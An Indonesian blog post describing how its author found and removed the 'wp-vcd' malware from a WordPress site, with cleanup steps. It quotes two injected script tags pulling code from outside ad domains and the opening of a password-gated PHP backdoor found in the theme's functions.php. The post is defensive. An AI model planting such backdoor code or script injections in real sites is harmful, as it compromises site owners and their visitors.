ask@prodigitalagency.com 0821 6859 0898
ask@prodigitalagency.com 0821 6859 0898

Memecahkan masalah yang mungkin sangat banyak di alami pengguna WordPress, Cerita sedikit. Beberapa waktu lalu saya melakukan Install Plugin secara Gratis untuk mengatur Role Pengguna Website. Saya menerima notifikasi dari Iklan Google Adwords yang saya jalankan pada website itu yang mengatakan bahwa website terdapat malware dan mencoba melakukan pengecekan malware dengan sitecheck.sucuri.net terdapat script yang mencurigakan seperti :

<#script type=”text/javascript” src=”//go.onclasrv.com/apu.php?zoneid=1426161″></script#>

Dan kedua menemukan :

<#script async=”async” type=”text/javascript” src=”//go.mobisla.com/notice.php?p=1426162&interactive=1&pushup=1″><#/script>

Dalam hal ini mungkin agak panik, Karena website pengecekan malware tidak menampilkan kode tersebut berada di file mana hanya menampilkan kode scriptnya saja.

 

Sedikit Googling dan menemukan cukup banyak Artikel tentang Malware ini, Namun kebanyakan dari Solusi yang ditemukan adalah melakukan Update Plugin dan Tema. Ya, Cara ini memang dianjurkan karena Update terbaru dari Plugin dan Tema akan menghindari serangan dari kelemahan di versi sebelumnya. Lanjut cara ini pun saya lakukan dan berharap bisa menghilangkan malware yang terdapat pada website. Kemudian saya melakukan pengecekan malware kembali dan hasilnya malware ini tidak bisa hilang dengan cara itu. Lalu, Saya mengecek menggunakan File Manager di Hosting untuk melihat semua file dan melakukan filter file terbaru / file yang baru di edit pada daftar di wp-includes. Saya menemukan beberapa file yang cukup mencurigakan yaitu wp-tmp.php, wp-feed.php, dan wp-vcd.php. Dimana ketiga file tersebut sangat mencurigakan karena seperti telah di edit dengan sendirinya. Lalu saya mencoba menghapus ketiga file tersebut dan setelah menghapus saya mencoba melakukan scan ulang malware. Hasilnya sangat mengecewakan karena Malware tersebut masih terdapat dalam website. Kemudian saya mencari informasi tentang wp-tmp.php wp-feed.php dan wp-vcd.php ini dan menemukan kesimpulan bahwa ketiga file ini akan selalu ada dan tidak bisa dihapus, Saya pun mengecek kembali ke file manager dengan mengakses wp-includes dan benar hasilnya saya menemukan ketiga file itu lagi yang sebelumnya saya hapus.

Saya membuka file function.php yang terdapat di dalam wp-themes dan tara saya menemukan file yang mengejutkan :

<#?php> if (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘password’] == ’17db40e41af3c208c63d24fdb0a90bfc’))
{
$div_code_name=”wp_vcd”;
switch ($_REQUEST[‘action’])
{

Kode ini cukup panjang, Diakhir kode :

//$start_wp_theme_tmp
//wp_tmp
//$end_wp_theme_tmp

 

Kesimpulan dan Solusi dari Malware ini adalah, Dengan menghapus kode seperti diatas dari awal kode sampai akhir (cukup panjang kodenya) pada file function.php di wp-theme/namatheme anda, Langkah selanjutnya anda bisa menghapus wp-tmp.php, wp-feed.php, dan wp-vcd.php yang ada di wp-includes. Semoga cara ini berhasil 🙂 Untuk memastikan Malware sudah hilang Anda bisa melakukan Scan Malware di sitecheck.sucuri.net, Dan jika Anda mengalami kendala ini saat beriklan di Google Adwords bisa menghubungi pihak Google melalui Facebook atau Website Google Adwords untuk dilakukan Pengecekan ulang Malware yang terdeteksi di website Anda.

Sekian dan Salam Sukses!

Cara Mengatasi Malware di WordPress

Penulis :

Anjas Swara
FOUNDER, PRO DIGITAL AGENCY

Referensi :

sitecheck.sucuri.net (Scan Malware)
forcewp.com (Images)

Leave a Reply